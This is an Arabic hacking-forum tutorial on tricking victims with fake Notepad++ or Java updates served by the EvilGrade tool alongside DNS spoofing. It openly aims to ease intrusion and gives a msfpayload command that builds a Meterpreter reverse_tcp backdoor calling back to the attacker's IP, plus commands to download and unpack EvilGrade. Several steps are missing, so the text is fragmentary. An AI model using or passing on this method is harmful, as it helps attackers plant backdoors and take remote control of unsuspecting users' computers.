عدد النقاط : 13
كيفكم اخواني واخواتي ان شاء الله الجميع بخير ياآرب .؟! دوم ان شاء الله مو يوم واتمنى الصحة والعافية للجميع اليوم معنا موضوع ان شاء الله ينال الاعجباب واستحسان الجميع يارب : notepad ++ Upgrades USE EvilGrade & DNS Poison طيب في البداية لازم نعطي خلفية عن الموضوع وتوضيح الفكر ة EvilGrade سكربت يقوم بعمل ترقية وهمية تحتوي على باك دور يتم حقنه بأحد البرامج التي تطلب تحديث مثل notepad++ أو j a v a الهدف منه: تسهيل عملية الاختراق بخداع الضحية بوجود تحديث لأحد البرامج المستخدمه من قبله كما يوجد خيار آخر لعمل هجوم MITM ايضا Evilgrade الذي سيقوم بتشغيل w e b Server يحتوي على تحديث مزيّف لبرنامج معين يعني ان صح التعبير تخدع هذه طيب البرامج التى يمكن ان تنطلي الحيلة عليها J A V A sun winzip winamp itunes speedbit openoffice linkedin osx notepadplus dap طيب الان نشرح مكا***ية العمل : 1-قوم بتكوين Backdoor باستخدام مشروع ميتاسبلويت بالخيارات التي تناسبنا. 2-استخدام مشروع Evilgrade الذي سيقوم بتشغيل w e b Server يحتوي على تحديث مزيّف لبرنامج j a v a 3-عمل DNS Spoof الان نذهـب للموقع هذا لتحميل EvilGrade كود PHP: http://www.infobyte.com.ar/ هذه واجه الموقع زي ماتشفون كود PHP: ./msfpayload windows/meterpreter/reverse_tcp LHOST= your IP LPORT= 4444 x > امتداد الحفظ كود PHP: cd /pentest/exploits/framework3 كود PHP: wget http://www.infobyte.com.ar/down/isr-evilgrade-1.0.0.tar.gz كود PHP: tar xvzf isr-evilgrade-1.0.0.tar.gz كود PHP: tar zxvf Data-dump-1.15.tar.gz طيب بعد التعديل الحمد لله الان الان نكمل بقية الخطوات الحمد لله انتهى الموضوع واتمنى ان ينال رضاكم وباذن الله اذا امدانا نشرح عملية التحديث للجافا دمت بخير وفي امان الله المصدر: :: vBspiders Professional Network ::notepad++ Upgrades USE EvilGrade & DNS Poison
http://www.infobyte.com.ar/
./msfpayload windows/meterpreter/reverse_tcp LHOST= your IP LPORT= 4444 x > امتداد الحفظ
cd /pentest/exploits/framework3
wget http://www.infobyte.com.ar/down/isr-evilgrade-1.0.0.tar.gz
tar xvzf isr-evilgrade-1.0.0.tar.gz
tar zxvf Data-dump-1.15.tar.gz
notepad++ Upgrades USE EvilGrade & DNS Poison